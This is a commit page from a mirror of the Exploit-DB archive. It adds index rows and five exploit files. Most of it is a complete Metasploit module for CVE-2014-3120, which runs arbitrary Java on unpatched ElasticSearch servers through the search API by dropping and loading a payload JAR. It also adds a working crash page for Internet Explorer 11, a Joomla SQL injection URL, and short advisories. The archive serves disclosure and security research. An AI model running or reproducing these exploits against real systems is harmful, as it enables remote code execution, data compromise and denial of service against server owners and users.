bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_01_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-01 04:36:38 +00:00
parent 65f378afeb
commit a6e4c23628
6 changed files with 279 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -30221,6 +30221,7 @@ id,file,description,date,author,platform,type,port
33546,platforms/php/webapps/33546.txt,"Jokes Complete Website results.php searchingred Parameter XSS",2010-01-18,indoushka,php,webapps,0
33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 'misc.php' SQL Injection Vulnerability",2010-01-18,indoushka,php,webapps,0
33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1Multiple Cross Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0
33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' File NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0
33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
@ -30254,3 +30255,7 @@ id,file,description,date,author,platform,type,port
33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0
33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0
33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0
33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x 64bit Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0
33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel h0wl Wylecial",windows,dos,0
33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200

Can't render this file because it is too large.

213
platforms/java/remote/33588.rb Executable file
View file

@ -0,0 +1,213 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in ElasticSearch,
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
REST API, which requires no authentication or authorization, where the search
function allows dynamic scripts execution, and can be used for remote attackers
to execute arbitrary Java code. This module has been tested successfully on
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
},
'Author' =>
[
'Alex Brasetvik', # Vulnerability discovery
'Bouke van der Bijl', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3120'],
['OSVDB', '106949'],
['EDB', '33370'],
['URL', 'http://bouk.co/blog/elasticsearch-rce/'],
['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'ElasticSearch 1.1.1 / Automatic', { } ]
],
'DisclosureDate' => 'Dec 09 2013',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9200),
OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]),
OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ])
], self.class)
end
def check
result = Exploit::CheckCode::Safe
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
result
end
def exploit
print_status("#{peer} - Trying to execute arbitrary Java..")
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end
print_status("#{peer} - Asking remote OS...")
res = execute(java_os)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...")
else
print_good("#{peer} - OS #{result} found")
end
jar_file = ""
if result =~ /win/i
print_status("#{peer} - Asking TEMP path")
res = execute(java_tmp_dir)
result = parse_result(res)
if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...")
else
print_good("#{peer} - TEMP path found on #{result}")
end
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
else
jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
end
register_file_for_cleanup(jar_file)
execute(java_payload(jar_file))
end
def vulnerable?
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
java = java_sum([addend_one, addend_two])
res = execute(java)
result = parse_result(res)
if result.nil?
return false
else
result.to_i == sum
end
end
def parse_result(res)
unless res && res.code == 200 && res.body
return nil
end
begin
json = JSON.parse(res.body.to_s)
rescue JSON::ParserError
return nil
end
begin
result = json['hits']['hits'][0]['fields']['msf_result'][0]
rescue
return nil
end
result
end
def java_sum(summands)
source = <<-EOF
#{summands.join(" + ")}
EOF
source
end
def to_java_byte_array(str)
buff = "byte[] buf = new byte[#{str.length}];\n"
i = 0
str.unpack('C*').each do |c|
buff << "buf[#{i}] = #{c};\n"
i = i + 1
end
buff
end
def java_os
"System.getProperty(\"os.name\")"
end
def java_tmp_dir
"System.getProperty(\"java.io.tmpdir\");"
end
def java_payload(file_name)
source = <<-EOF
import java.io.*;
import java.lang.*;
import java.net.*;
#{to_java_byte_array(payload.encoded_jar.pack)}
File f = new File('#{file_name.gsub(/\\/, "/")}');
FileOutputStream fs = new FileOutputStream(f);
bs = new BufferedOutputStream(fs);
bs.write(buf);
bs.close();
bs = null;
URL u = f.toURI().toURL();
URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
Class c = cl.loadClass('metasploit.Payload');
c.main(null);
EOF
source
end
def execute(java)
payload = {
"size" => 1,
"query" => {
"filtered" => {
"query" => {
"match_all" => {}
}
}
},
"script_fields" => {
"msf_result" => {
"script" => java
}
}
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
'method' => 'POST',
'data' => JSON.generate(payload)
})
return res
end
end

11
platforms/linux/dos/33549.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37857/info
OpenOffice is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference.
Attackers can exploit this issue by enticing an unsuspecting victim to open a specially crafted '.slk' file.
Successful exploits will cause the application to crash, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
OpenOffice 3.1.0 and 3.1.1 are vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33549.slk

11
platforms/linux/dos/33585.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38027/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users.
Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.
NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.
http://www.exploit-db.com/sploits/

7
platforms/php/webapps/33586.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38033/info
The 'com_gambling' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit]

32
platforms/windows/dos/33587.html Executable file
View file

@ -0,0 +1,32 @@
<!--
# Exploit title: Microsoft Internet Explorer 11 - WeakMap Integer
divide-by-zero DoS
# Date: 29.05.2014
# Vulnerable version: 11
# Tested on: Windows 7/8
# Author: Pawel Wylecial
# http://h0wl.pl @h0wlu
-->
<html>
<script>
var a = [new WeakMap];
a.push(new WeakMap);
a[1].set(a[0], a[1]);
a[0].delete(a[0]);
</script>
</html>
<!--
(674.2408): Integer divide-by-zero - code c0000094 (!!! second chance !!!)
eax=0087e241 ebx=04598cc0 ecx=04598cc8 edx=00000000 esi=04598cc8
edi=041f1aa0
eip=668756f0 esp=05b4b8ac ebp=05b4b8bc iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010206
jscript9!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicObject,bool,RecyclerPointerComparer<Js::DynamicObject
const *>,1>::TryGetValueAndRemove+0x1f:
668756f0 f736 div eax,dword ptr [esi]
ds:002b:04598cc8=00000000
-->